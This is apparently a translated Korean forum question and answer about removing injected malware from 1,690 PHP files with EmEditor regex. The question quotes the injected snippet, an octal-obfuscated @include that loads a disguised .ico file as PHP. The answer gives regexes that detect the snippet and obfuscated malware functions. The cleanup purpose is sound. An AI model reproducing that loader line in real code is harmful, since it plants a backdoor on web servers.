EMEditor와 정규식을 사용하여 찾고 바꾸는 방법을 찾으려고 노력합니다. 나는 아래 항목에 이것을 적용하려고 노력합니다.
<?php
/*f04b8*/
@include "\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o";
/*f04b8*/ // ini_set(?display_errors?, 1);
사이의 코드를 교체/삭제하려고 합니다.
<?php
그리고
// ini_set(?display_errors?, 1);
그 사이의 모든 것은 내가 많은 파일에서 꺼내려고 하는 이 악성 소프트웨어 스크립트입니다.
1690 파일에서 이것을 삭제하는 쉬운 방법을 찾습니다. 어떤 아이디어라도 매우 도움이 될 것입니다.
행운을 빕니다, 토마스
답변1
유사한 문자열에 대한 PHP RegExpression은 다음과 같습니다.
/(\/\*.....\*\/\r\n\r\n@include.".*.";\r\n\r\n\/\*.....\*\/|\/\*.....\*\/\n\n@include.".*.";\n\n\/\*.....\*\/)/
이는 더 단순화될 수 있지만 있는 그대로 작동합니다.
**이렇게 하면 개행이 아닌 임의의 문자 5개가 포함된 주석 블록으로 시작하여 두 개의 새 줄, @include 줄, 두 개의 추가 새 줄 및 일치하는 블록 주석 클로저가 뒤따르는 모든 문제 있는 문자열을 찾습니다. 문서가 Windows, Mac 또는 Linux 시스템에 저장되었는지 여부 - 참고 \r\n(Windows 시스템) 및 \n\n(Linux 및 Mac 시스템)
다음 정규식에서 문자열이 일치하는지 확인했습니다. https://ingram-braun.net/erga/online-regex-tester-perl-php-javascript/
빠른 주의, 난독화된 함수가 포함된 임의의 문자열 이름이 포함된 악성 코드 파일을 찾으려면... 다음 정규식을 사용하십시오...
/function...\(\$..\){\$...\=."/
이렇게 하면 변경된 파일을 추적하고 영향을 받는 맬웨어와 동일한 추가 맬웨어 파일을 찾을 수 있습니다.
좋은 하루 보내세요! 이것이 누군가에게 여전히 유용하기를 바랍니다.